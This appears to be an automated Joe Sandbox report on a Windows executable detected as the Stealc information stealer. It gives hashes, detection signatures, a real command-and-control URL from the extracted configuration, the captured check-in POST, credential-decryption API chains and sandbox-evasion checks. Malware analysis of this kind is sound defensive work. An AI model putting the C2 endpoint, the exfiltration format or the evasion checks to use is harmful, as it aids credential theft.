Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1543747
MD5:fae77ee19103237b52405630de9aa6a7
SHA1:5fa3fae94c12a0fc0fa6de9d9dfb72aa0ee0749b
SHA256:09a622aeeec375f783c6a88a7f9bb6f9a1cf90af6dcf2d57f18eda2ca5a88cca
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6528 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FAE77EE19103237B52405630DE9AA6A7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2065563617.0000000005130000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6528JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6528JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.7e0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-28T11:22:06.086992+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.7e0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_007F9030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_007EA210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EA2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_007EA2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_007E72A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_007EC920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2065563617.000000000515B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2065563617.000000000515B000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_007F40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_007EE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007E1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_007F47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007EF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007F4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007F3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_007EDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_007EBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_007EEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007EDF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAKHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 46 41 36 37 44 42 37 32 31 38 31 39 34 33 30 31 37 39 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 2d 2d 0d 0a Data Ascii: ------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="hwid"9AFA67DB7218194301792------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="build"tale------HJDBFBKKJDHJKECBGDAK--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_007E62D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAKHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 46 41 36 37 44 42 37 32 31 38 31 39 34 33 30 31 37 39 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 2d 2d 0d 0a Data Ascii: ------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="hwid"9AFA67DB7218194301792------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="build"tale------HJDBFBKKJDHJKECBGDAK--
                Source: file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2107101816.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/m
                Source: file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpH
                Source: file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpl
                Source: file.exe, 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206xj:o
                Source: file.exe, file.exe, 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2065563617.000000000515B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008200980_2_00820098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083B1980_2_0083B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D0_2_00C3714D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008121380_2_00812138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008242880_2_00824288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4420C0_2_00D4420C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084E2580_2_0084E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC83A40_2_00BC83A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085D39E0_2_0085D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3C39B0_2_00C3C39B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2D3B30_2_00C2D3B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086B3080_2_0086B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7930B0_2_00B7930B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C413370_2_00C41337
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D504700_2_00D50470
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008245A80_2_008245A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084D5A80_2_0084D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6C5760_2_00C6C576
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080E5440_2_0080E544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008045730_2_00804573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008266C80_2_008266C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C306950_2_00C30695
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008696FD0_2_008696FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085A6480_2_0085A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADE6500_2_00ADE650
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008567990_2_00856799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B137800_2_00B13780
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083D7200_2_0083D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F8C30_2_00C3F8C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083B8A80_2_0083B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008398B80_2_008398B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084F8D60_2_0084F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3A8020_2_00C3A802
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008348680_2_00834868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C339850_2_00C33985
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C44AA00_2_00C44AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00850B880_2_00850B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00854BA80_2_00854BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00848BD90_2_00848BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085AC280_2_0085AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C38C220_2_00C38C22
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC5C420_2_00BC5C42
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00835DB90_2_00835DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00834DC80_2_00834DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084AD380_2_0084AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083BD680_2_0083BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE3D3C0_2_00CE3D3C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00811D780_2_00811D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB2E970_2_00BB2E97
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00851EE80_2_00851EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C09E640_2_00C09E64
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00828E780_2_00828E78
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 007E4610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: gauffcuy ZLIB complexity 0.9951195825030656
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_007F9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_007F3970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\B4NB3DDZ.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2108416 > 1048576
                Source: file.exeStatic PE information: Raw size of gauffcuy is bigger than: 0x100000 < 0x197c00
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2065563617.000000000515B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2065563617.000000000515B000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.7e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;gauffcuy:EW;psmvcilc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;gauffcuy:EW;psmvcilc:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007F9BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x20a51a should be: 0x20d3d2
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: gauffcuy
                Source: file.exeStatic PE information: section name: psmvcilc
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC90DF push ebx; mov dword ptr [esp], esp0_2_00CC93C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBC0F1 push eax; mov dword ptr [esp], edx0_2_00CBC15C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080A0DC push eax; retf 0_2_0080A0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D160B6 push edi; mov dword ptr [esp], ebx0_2_00D160C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6B1DB push 1F989FE8h; mov dword ptr [esp], ebx0_2_00C6B234
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEF1F5 push 7D0BEE07h; mov dword ptr [esp], eax0_2_00CEF217
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB11A9 push 120A7CA7h; mov dword ptr [esp], eax0_2_00CB1200
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF61B7 push esi; mov dword ptr [esp], 7DF53A1Ah0_2_00CF68ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080A109 push eax; retf 0_2_0080A119
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push edi; mov dword ptr [esp], 0ADFD511h0_2_00C37152
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push 33FAF517h; mov dword ptr [esp], ebx0_2_00C37175
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push eax; mov dword ptr [esp], 7CF755E1h0_2_00C37181
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push eax; mov dword ptr [esp], ebx0_2_00C371DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push 3EEB1F1Fh; mov dword ptr [esp], edi0_2_00C372CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push ebx; mov dword ptr [esp], 30F34DCDh0_2_00C3736C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push 03A83FB7h; mov dword ptr [esp], eax0_2_00C37380
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push ebp; mov dword ptr [esp], 773FB7B2h0_2_00C3742F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push eax; mov dword ptr [esp], ebp0_2_00C37448
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push ebx; mov dword ptr [esp], edi0_2_00C3747B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push ebx; mov dword ptr [esp], edx0_2_00C37494
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push edi; mov dword ptr [esp], 1EA6D876h0_2_00C374DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push ebx; mov dword ptr [esp], ebp0_2_00C3750C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push edi; mov dword ptr [esp], eax0_2_00C37558
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push edi; mov dword ptr [esp], ecx0_2_00C375BC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push 7C4C256Dh; mov dword ptr [esp], esi0_2_00C375C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push 6424AE5Bh; mov dword ptr [esp], edx0_2_00C37620
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push eax; mov dword ptr [esp], ebx0_2_00C37626
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push 1A565701h; mov dword ptr [esp], edx0_2_00C37758
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push edx; mov dword ptr [esp], edi0_2_00C3778E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push 1428FA98h; mov dword ptr [esp], edx0_2_00C377CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3714D push esi; mov dword ptr [esp], ecx0_2_00C377EE
                Source: file.exeStatic PE information: section name: gauffcuy entropy: 7.95487743480404

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
